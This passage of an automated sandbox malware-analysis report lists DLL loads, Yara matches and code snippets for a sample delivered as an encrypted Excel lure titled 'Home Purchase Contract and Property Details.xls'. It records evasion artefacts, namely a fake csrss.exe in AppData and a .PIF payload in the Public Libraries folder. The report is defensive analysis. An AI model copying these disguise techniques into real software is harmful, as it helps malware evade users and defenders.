                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: credssp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: shcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: wow64win.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: version.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ?????.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: url.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ieframe.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ???.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ????.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??????s.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: webio.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ???y.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ???y.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ???y.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ????.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ????.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ????.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ???2.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ???2.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ???2.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ???.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ???.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ???.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??????s.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??????s?s.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??????s.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFSection loaded: ??.dllJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdb source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdbH source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmp
                  Source: ~DF78F515A159E2AA69.TMP.0.drInitial sample: OLE indicators vbamacros = False
                  Source: Home Purchase Contract and Property Details.xlsInitial sample: OLE indicators encrypted = True

                  Data Obfuscation

                  barindex
                  Source: Yara matchFile source: 11.2.Efftwcmk.PIF.2c70000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.Efftwcmk.PIF.2c70000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D54D86 GetSystemDirectoryA,LoadLibraryA,LoadLibraryA,GetProcAddress,8_2_33D54D86
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D97106 push ecx; ret 8_2_33D97119
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D74E56 push ecx; ret 8_2_33D74E69
